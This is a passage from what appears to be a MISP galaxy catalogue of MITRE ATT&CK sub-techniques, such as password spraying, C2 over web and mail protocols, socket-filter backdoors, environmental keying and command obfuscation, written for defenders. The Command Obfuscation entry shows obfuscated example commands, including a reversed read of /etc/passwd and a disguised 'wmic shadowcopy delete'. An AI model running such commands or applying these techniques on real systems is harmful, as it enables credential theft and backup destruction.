  • MSSQL (1433/TCP)

  • Oracle (1521/TCP)

  • MySQL (3306/TCP)

  • VNC (5900/TCP)

  • SNMP (161/UDP and 162/TCP/UDP)

In addition to management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols," as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018). Further, adversaries may abuse network device interfaces (such as wlanAPI) to brute force accessible wifi-router(s) via wireless authentication protocols.(Citation: Trend Micro Emotet 2020)

In default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows "logon failure" event ID 4625.

The tag is: misp-galaxy:mitre-attack-pattern="Password Guessing - T1110.001"

Table 5997. Table References

Links

https://attack.mitre.org/techniques/T1110/001

https://web.archive.org/web/20200302085133/https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/emotet-now-spreads-via-wi-fi

https://www.us-cert.gov/ncas/alerts/TA18-086A

Password Cracking - T1110.002

Adversaries may use password cracking to attempt to recover usable credentials, such as plaintext passwords, when credential material such as password hashes are obtained. [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) can be used to obtain password hashes, this may only get an adversary so far when [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) is not an option. Further, adversaries may leverage [Data from Configuration Repository](https://attack.mitre.org/techniques/T1602) in order to obtain hashed credentials for network devices.(Citation: US-CERT-TA18-106A)

Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table to crack hashes. Cracking hashes is usually done on adversary-controlled systems outside of the target network.(Citation: Wikipedia Password cracking) The resulting plaintext password resulting from a successfully cracked hash may be used to log into systems, resources, and services in which the account has access.

The tag is: misp-galaxy:mitre-attack-pattern="Password Cracking - T1110.002"

Table 5998. Table References

Links

https://attack.mitre.org/techniques/T1110/002

https://en.wikipedia.org/wiki/Password_cracking

https://www.us-cert.gov/ncas/alerts/TA18-106A

Password Spraying - T1110.003

Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)

Typically, management services over commonly used ports are used when password spraying. Commonly targeted services include the following:

  • SSH (22/TCP)

  • Telnet (23/TCP)

  • FTP (21/TCP)

  • NetBIOS / SMB / Samba (139/TCP & 445/TCP)

  • LDAP (389/TCP)

  • Kerberos (88/TCP)

  • RDP / Terminal Services (3389/TCP)

  • HTTP/HTTP Management Services (80/TCP & 443/TCP)

  • MSSQL (1433/TCP)

  • Oracle (1521/TCP)

  • MySQL (3306/TCP)

  • VNC (5900/TCP)

In addition to management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols," as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018)

In default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows "logon failure" event ID 4625.

The tag is: misp-galaxy:mitre-attack-pattern="Password Spraying - T1110.003"

Table 5999. Table References

Links

http://www.blackhillsinfosec.com/?p=4645

https://attack.mitre.org/techniques/T1110/003

https://www.trimarcsecurity.com/single-post/2018/05/06/Trimarc-Research-Detecting-Password-Spraying-with-Security-Event-Auditing

https://www.us-cert.gov/ncas/alerts/TA18-086A

Credential Stuffing - T1110.004

Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts.

Credential stuffing is a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization’s login failure policies.

Typically, management services over commonly used ports are used when stuffing credentials. Commonly targeted services include the following:

  • SSH (22/TCP)

  • Telnet (23/TCP)

  • FTP (21/TCP)

  • NetBIOS / SMB / Samba (139/TCP & 445/TCP)

  • LDAP (389/TCP)

  • Kerberos (88/TCP)

  • RDP / Terminal Services (3389/TCP)

  • HTTP/HTTP Management Services (80/TCP & 443/TCP)

  • MSSQL (1433/TCP)

  • Oracle (1521/TCP)

  • MySQL (3306/TCP)

  • VNC (5900/TCP)

In addition to management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols," as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018)

The tag is: misp-galaxy:mitre-attack-pattern="Credential Stuffing - T1110.004"

Table 6000. Table References

Links

https://attack.mitre.org/techniques/T1110/004

https://www.us-cert.gov/ncas/alerts/TA18-086A

Web Protocols - T1071.001

Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.

Protocols such as HTTP/S(Citation: CrowdStrike Putter Panda) and WebSocket(Citation: Brazking-Websockets) that carry web traffic may be very common in environments. HTTP/S packets have many fields and headers in which data can be concealed. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.

The tag is: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001"

Table 6001. Table References

Links

http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1071/001

https://securityintelligence.com/posts/brazking-android-malware-upgraded-targeting-brazilian-banks/

Bidirectional Communication - T1102.002

Adversaries may use an existing, legitimate external Web service as a means for sending commands to and receiving output from a compromised system over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems can then send the output from those commands back over that Web service channel. The return traffic may occur in a variety of ways, depending on the Web service being utilized. For example, the return traffic may take the form of the compromised system posting a comment on a forum, issuing a pull request to development project, updating a document hosted on a Web service, or by sending a Tweet.

Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.

The tag is: misp-galaxy:mitre-attack-pattern="Bidirectional Communication - T1102.002"

Table 6002. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1102/002

An adversary may rely upon a user clicking a malicious link in order to gain execution. Users may be subjected to social engineering to get them to click on a link that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002). Clicking on a link may also lead to other execution techniques such as exploitation of a browser or application vulnerability via [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203). Links may also lead users to download files that require execution via [Malicious File](https://attack.mitre.org/techniques/T1204/002).

The tag is: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001"

Table 6003. Table References

Links

https://attack.mitre.org/techniques/T1204/001

Port Knocking - T1205.001

Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.

This technique has been observed both for the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system.

The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.

The tag is: misp-galaxy:mitre-attack-pattern="Port Knocking - T1205.001"

Table 6004. Table References

Links

https://attack.mitre.org/techniques/T1205/001

https://www.giac.org/paper/gcih/342/handle-cd00r-invisible-backdoor/103631

Binary Padding - T1027.001

Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This can be done without affecting the functionality or behavior of a binary, but can increase the size of the binary beyond what some security tools are capable of handling due to file size limitations.

Binary padding effectively changes the checksum of the file and can also be used to avoid hash-based blocklists and static anti-virus signatures.(Citation: ESET OceanLotus) The padding used is commonly generated by a function to create junk data and then appended to the end or applied to sections of malware.(Citation: Securelist Malware Tricks April 2017) Increasing the file size may decrease the effectiveness of certain tools and detection capabilities that are not designed or configured to scan large files. This may also reduce the likelihood of being collected for analysis. Public file scanning services, such as VirusTotal, limits the maximum size of an uploaded file to be analyzed.(Citation: VirusTotal FAQ)

The tag is: misp-galaxy:mitre-attack-pattern="Binary Padding - T1027.001"

Table 6005. Table References

Links

https://attack.mitre.org/techniques/T1027/001

https://securelist.com/old-malware-tricks-to-bypass-detection-in-the-age-of-big-data/78010/

https://www.virustotal.com/en/faq/

https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/

Command Obfuscation - T1027.010

Adversaries may obfuscate content during command execution to impede detection. Command-line obfuscation is a method of making strings and patterns within commands and scripts more difficult to signature and analyze. This type of obfuscation can be included within commands executed by delivered payloads (e.g., [Phishing](https://attack.mitre.org/techniques/T1566) and [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)) or interactively via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).(Citation: Akamai JS)(Citation: Malware Monday VBE)

For example, adversaries may abuse syntax that utilizes various symbols and escape characters (such as spacing, ^, `. `$`, and `%`) to make commands difficult to analyze while maintaining the same intended functionality.(Citation: RC PowerShell) Many languages support built-in obfuscation in the form of base64 or URL encoding.(Citation: Microsoft PowerShellB64) Adversaries may also manually implement command obfuscation via string splitting (`“Wor”“d.Application”), order and casing of characters (rev <<<'dwssap/cte/ tac'), globing (mkdir -p '/tmp/:&$NiA'), as well as various tricks involving passing strings through tokens/environment variables/input streams.(Citation: Bashfuscator Command Obfuscators)(Citation: FireEye Obfuscation June 2017)

Adversaries may also use tricks such as directory traversals to obfuscate references to the binary being invoked by a command (C:\voi\pcw\..\..\Windows\tei\qs\k\..\..\..\system32\erool\..\wbem\wg\je\..\..\wmic.exe shadowcopy delete).(Citation: Twitter Richard WMIC)

Tools such as <code>Invoke-Obfuscation</code> and <code>Invoke-DOSfucation</code> have also been used to obfuscate commands.(Citation: Invoke-DOSfuscation)(Citation: Invoke-Obfuscation)

The tag is: misp-galaxy:mitre-attack-pattern="Command Obfuscation - T1027.010"

Table 6006. Table References

Links

https://attack.mitre.org/techniques/T1027/010

https://bashfuscator.readthedocs.io/en/latest/Mutators/command_obfuscators/index.html

https://bromiley.medium.com/malware-monday-vbscript-and-vbe-files-292252c1a16

https://github.com/danielbohannon/Invoke-DOSfuscation

https://github.com/danielbohannon/Invoke-Obfuscation

https://learn.microsoft.com/powershell/module/microsoft.powershell.core/about/about_powershell_exe?view=powershell-5.1#-encodedcommand-base64encodedcommand

https://redcanary.com/threat-detection-report/techniques/powershell/

https://twitter.com/rfackroyd/status/1639136000755765254

https://web.archive.org/web/20170923102302/https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html

https://www.akamai.com/blog/security/catch-me-if-you-can-javascript-obfuscation

Cloud Services - T1021.007

Adversaries may log into accessible cloud services within a compromised environment using [Valid Accounts](https://attack.mitre.org/techniques/T1078) that are synchronized with or federated to on-premises user identities. The adversary may then perform management actions or access cloud-hosted resources as the logged-on user.

Many enterprises federate centrally managed user identities to cloud services, allowing users to login with their domain credentials in order to access the cloud control plane. Similarly, adversaries may connect to available cloud services through the web console or through the cloud command line interface (CLI) (e.g., [Cloud API](https://attack.mitre.org/techniques/T1059/009)), using commands such as <code>Connect-AZAccount</code> for Azure PowerShell, <code>Connect-MgGraph</code> for Microsoft Graph PowerShell, and <code>gcloud auth login</code> for the Google Cloud CLI.

In some cases, adversaries may be able to authenticate to these services via [Application Access Token](https://attack.mitre.org/techniques/T1550/001) instead of a username and password.

The tag is: misp-galaxy:mitre-attack-pattern="Cloud Services - T1021.007"

Table 6007. Table References

Links

https://attack.mitre.org/techniques/T1021/007

Mail Protocols - T1071.003

Adversaries may communicate using application layer protocols associated with electronic mail delivery to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.

Protocols such as SMTP/S, POP3/S, and IMAP that carry electronic mail may be very common in environments. Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the email messages themselves. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.

The tag is: misp-galaxy:mitre-attack-pattern="Mail Protocols - T1071.003"

Table 6008. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1071/003

Environmental Keying - T1480.001

Adversaries may environmentally key payloads or other features of malware to evade defenses and constraint execution to a specific target environment. Environmental keying uses cryptography to constrain execution or actions based on adversary supplied environment specific conditions that are expected to be present on the target. Environmental keying is an implementation of [Execution Guardrails](https://attack.mitre.org/techniques/T1480) that utilizes cryptographic techniques for deriving encryption/decryption keys from specific types of values in a given computing environment.(Citation: EK Clueless Agents)

Values can be derived from target-specific elements and used to generate a decryption key for an encrypted payload. Target-specific values can be derived from specific network shares, physical devices, software/software versions, files, joined AD domains, system time, and local/external IP addresses.(Citation: Kaspersky Gauss Whitepaper)(Citation: Proofpoint Router Malvertising)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware) By generating the decryption keys from target-specific environmental values, environmental keying can make sandbox detection, anti-virus detection, crowdsourcing of information, and reverse engineering difficult.(Citation: Kaspersky Gauss Whitepaper)(Citation: Ebowla: Genetic Malware) These difficulties can slow down the incident response process and help adversaries hide their tactics, techniques, and procedures (TTPs).

Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.

Like other [Execution Guardrails](https://attack.mitre.org/techniques/T1480), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful.

The tag is: misp-galaxy:mitre-attack-pattern="Environmental Keying - T1480.001"

Table 6009. Table References

Links

https://attack.mitre.org/techniques/T1480/001

https://github.com/Genetic-Malware/Ebowla/blob/master/Eko_2016_Morrow_Pitts_Master.pdf

https://github.com/nccgroup/demiguise/blob/master/examples/virginkey.js

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/20134940/kaspersky-lab-gauss.pdf

https://pdfs.semanticscholar.org/2721/3d206bc3c1e8c229fb4820b6af09e7f975da.pdf

https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/smuggling-hta-files-in-internet-exploreredge/

https://www.proofpoint.com/us/threat-insight/post/home-routers-under-attack-malvertising-windows-android-devices

https://www.schneier.com/academic/paperfiles/paper-clueless-agents.pdf

Domain Properties - T1590.001

Adversaries may gather information about the victim’s network domain(s) that can be used during targeting. Information about domains and their properties may include a variety of details, including what domain(s) the victim owns as well as administrative data (ex: name, registrar, etc.) and more directly actionable information such as contacts (email addresses and phone numbers), business addresses, and name servers.

Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about victim domains and their properties may also be exposed to adversaries via online or other accessible data sets (ex: [WHOIS](https://attack.mitre.org/techniques/T1596/002)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Where third-party cloud providers are in use, this information may also be exposed through publicly available API endpoints, such as GetUserRealm and autodiscover in Office 365 environments.(Citation: Azure Active Directory Reconnaisance)(Citation: Office 265 Azure Domain Availability) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).

The tag is: misp-galaxy:mitre-attack-pattern="Domain Properties - T1590.001"

Table 6010. Table References

Links

https://attack.mitre.org/techniques/T1590/001

https://dnsdumpster.com/

https://docs.microsoft.com/en-us/archive/blogs/tip_of_the_day/cloud-tip-of-the-day-advanced-way-to-check-domain-availability-for-office-365-and-azure

https://o365blog.com/post/just-looking/

https://www.circl.lu/services/passive-dns/

https://www.whois.net/

Web Cookies - T1606.001

Adversaries may forge web cookies that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies to authenticate and authorize user access.

Adversaries may generate these cookies in order to gain access to web resources. This differs from [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539) and other similar behaviors in that the cookies are new and forged by the adversary, rather than stolen or intercepted from legitimate users. Most common web applications have standardized and documented cookie values that can be generated using provided tools or interfaces.(Citation: Pass The Cookie) The generation of web cookies often requires secret values, such as passwords, [Private Keys](https://attack.mitre.org/techniques/T1552/004), or other cryptographic seed values.

Once forged, adversaries may use these web cookies to access resources ([Web Session Cookie](https://attack.mitre.org/techniques/T1550/004)), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Volexity SolarWinds)(Citation: Pass The Cookie)(Citation: Unit 42 Mac Crypto Cookies January 2019)

The tag is: misp-galaxy:mitre-attack-pattern="Web Cookies - T1606.001"

Table 6011. Table References

Links

https://attack.mitre.org/techniques/T1606/001

https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/

https://wunderwuzzi23.github.io/blog/passthecookie.html

https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/

Upload Malware - T1608.001

Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.

Malware may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Malware can also be staged on web services, such as GitHub or Pastebin, or hosted on the InterPlanetary File System (IPFS), where decentralized content storage makes the removal of malicious files difficult.(Citation: Volexity Ocean Lotus November 2020)(Citation: Talos IPFS 2022)

Adversaries may upload backdoored files, such as application binaries, virtual machine images, or container images, to third-party software stores or repositories (ex: GitHub, CNET, AWS Community AMIs, Docker Hub). By chance encounter, victims may directly download/install these backdoored files via [User Execution](https://attack.mitre.org/techniques/T1204). [Masquerading](https://attack.mitre.org/techniques/T1036) may increase the chance of users mistakenly executing these files.

The tag is: misp-galaxy:mitre-attack-pattern="Upload Malware - T1608.001"

Table 6012. Table References

Links

https://attack.mitre.org/techniques/T1608/001

https://blog.talosintelligence.com/ipfs-abuse/

https://www.volexity.com/blog/2020/11/06/oceanlotus-extending-cyber-espionage-operations-through-fake-websites/

Local Groups - T1069.001

Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.

Commands such as <code>net localgroup</code> of the [Net](https://attack.mitre.org/software/S0039) utility, <code>dscl . -list /Groups</code> on macOS, and <code>groups</code> on Linux can list local groups.

The tag is: misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001"

Table 6013. Table References

Links

https://attack.mitre.org/techniques/T1069/001

Default Accounts - T1078.001

Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)

Default accounts are not limited to client machines, rather also include accounts that are preset for equipment such as network devices and computer applications whether they are internal, open source, or commercial. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed or stolen [Private Keys](https://attack.mitre.org/techniques/T1552/004) or credential materials to legitimately connect to remote environments via [Remote Services](https://attack.mitre.org/techniques/T1021).(Citation: Metasploit SSH Module)

The tag is: misp-galaxy:mitre-attack-pattern="Default Accounts - T1078.001"

Table 6014. Table References

Links

https://attack.mitre.org/techniques/T1078/001

https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html

https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts

https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits/linux/ssh

https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/

Local Account - T1087.001

Adversaries may attempt to get a listing of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.

Commands such as <code>net user</code> and <code>net localgroup</code> of the [Net](https://attack.mitre.org/software/S0039) utility and <code>id</code> and <code>groups</code>on macOS and Linux can list local users and groups. On Linux, local users can also be enumerated through the use of the <code>/etc/passwd</code> file. On macOS the <code>dscl . list /Users</code> command can be used to enumerate local accounts.

The tag is: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001"

Table 6015. Table References

Links

https://attack.mitre.org/techniques/T1087/001

https://www.elastic.co/blog/embracing-offensive-tooling-building-detections-against-koadic-using-eql

Malicious File - T1204.002

An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001). Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.

Adversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036) and [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to increase the likelihood that a user will open and successfully execute a malicious file. These methods may include using a familiar naming convention and/or password protecting the file and supplying instructions to a user on how to open it.(Citation: Password Protected Word Docs)

While [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user’s desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).

The tag is: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002"

Table 6016. Table References

Links

https://attack.mitre.org/techniques/T1204/002

https://www.bleepingcomputer.com/news/security/psa-dont-open-spam-containing-password-protected-word-docs/

Socket Filters - T1205.002

Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the libpcap library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.

To establish a connection, an adversary sends a crafted packet to the targeted host that matches the installed filter criteria.(Citation: haking9 libpcap network sniffing) Adversaries have used these socket filters to trigger the installation of implants, conduct ping backs, and to invoke command shells. Communication with these socket filters may also be used in conjunction with [Protocol Tunneling](https://attack.mitre.org/techniques/T1572).(Citation: exatrack bpf filters passive backdoors)(Citation: Leonardo Turla Penquin May 2020)

Filters can be installed on any Unix-like platform with libpcap installed or on Windows hosts using Winpcap. Adversaries may use either libpcap with pcap_setfilter or the standard library function setsockopt with SO_ATTACH_FILTER options. Since the socket connection is not active until the packet is received, this behavior may be difficult to detect due to the lack of activity on a host, low CPU overhead, and limited visibility into raw socket usage.

The tag is: misp-galaxy:mitre-attack-pattern="Socket Filters - T1205.002"

Table 6017. Table References

Links

http://recursos.aldabaknocking.com/libpcapHakin9LuisMartinGarcia.pdf

https://attack.mitre.org/techniques/T1205/002

https://exatrack.com/public/Tricephalic_Hellkeeper.pdf

https://www.crowdstrike.com/blog/how-to-hunt-for-decisivearchitect-and-justforfun-implant/

https://www.leonardo.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf

Software Packing - T1027.002

Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable’s original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.(Citation: ESET FinFisher Jan 2018)

Utilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.(Citation: Awesome Executable Packing)

The tag is: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002"

Table 6018. Table References

Links

https://attack.mitre.org/techniques/T1027/002

https://github.com/dhondta/awesome-executable-packing

https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf

Malicious Image - T1204.003

Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via [Upload Malware](https://attack.mitre.org/techniques/T1608/001), and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the instance or container.(Citation: Summit Route Malicious AMIs)

Adversaries may also name images a certain way to increase the chance of users mistakenly deploying an instance or container from the image (ex: [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005)).(Citation: Aqua Security Cloud Native Threat Report June 2021)

The tag is: misp-galaxy:mitre-attack-pattern="Malicious Image - T1204.003"

Table 6019. Table References

Links

https://attack.mitre.org/techniques/T1204/003

https://info.aquasec.com/hubfs/Threat%20reports/AquaSecurity_Cloud_Native_Threat_Report_2021.pdf?utm_campaign=WP%20-%20Jun2021%20Nautilus%202021%20Threat%20Research%20Report&utm_medium=email&_hsmi=132931006&_hsenc=p2ANqtz-_8oopT5Uhqab8B7kE0l3iFo1koirxtyfTehxF7N-EdGYrwk30gfiwp5SiNlW3G0TNKZxUcDkYOtwQ9S6nNVNyEO-Dgrw&utm_content=132931006&utm_source=hs_automation

https://summitroute.com/blog/2018/09/24/investigating_malicious_amis/

File Deletion - T1630.002

Adversaries may wipe a device or delete individual files in order to manipulate external outcomes or hide activity. An application must have administrator access to fully wipe the device, while individual files may not require special permissions to delete depending on their storage location.(Citation: Android DevicePolicyManager 2019)

Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The impact file deletion will have depends on the type of data as well as the goals and objectives of the adversary, but can include deleting update files to evade detection or deleting attacker-specified files for impact.

The tag is: misp-galaxy:mitre-attack-pattern="File Deletion - T1630.002"

Table 6020. Table References

Links

https://attack.mitre.org/techniques/T1630/002

https://developer.android.com/reference/android/app/admin/DevicePolicyManager.html

Login Hook - T1037.002

Adversaries may use a Login Hook to establish persistence executed upon user logon. A login hook is a plist file that points to a specific script to execute with root privileges upon user logon. The plist file is located in the <code>/Library/Preferences/com.apple.loginwindow.plist</code> file and can be modified using the <code>defaults</code> command-line utility. This behavior is the same for logout hooks where a script can be executed upon user logout. All hooks require administrator permissions to modify or create hooks.(Citation: Login Scripts Apple Dev)(Citation: LoginWindowScripts Apple Dev)

Adversaries can add or insert a path to a malicious script in the <code>com.apple.loginwindow.plist</code> file, using the <code>LoginHook</code> or <code>LogoutHook</code> key-value pair. The malicious script is executed upon the next user login. If a login hook already exists, adversaries can add additional commands to an existing login hook. There can be only one login and logout hook on a system at a time.(Citation: S1 macOs Persistence)(Citation: Wardle Persistence Chapter)

Note: Login hooks were deprecated in 10.11 version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001)

The tag is: misp-galaxy:mitre-attack-pattern="Login Hook - T1037.002"

Table 6021. Table References

Links

https://attack.mitre.org/techniques/T1037/002

https://developer.apple.com/documentation/devicemanagement/loginwindowscripts

https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CustomLogin.html

https://taomm.org/PDFs/vol1/CH%200x02%20Persistence.pdf

https://www.sentinelone.com/blog/how-malware-persists-on-macos/

Software Packing - T1406.002

Adversaries may perform software packing to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory.

Utilities used to perform software packing are called packers. An example packer is FTT. A more comprehensive list of known packers is available, but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.

The tag is: misp-galaxy:mitre-attack-pattern="Software Packing - T1406.002"

Table 6022. Table References

Links

https://attack.mitre.org/techniques/T1406/002

Transport Agent - T1505.002

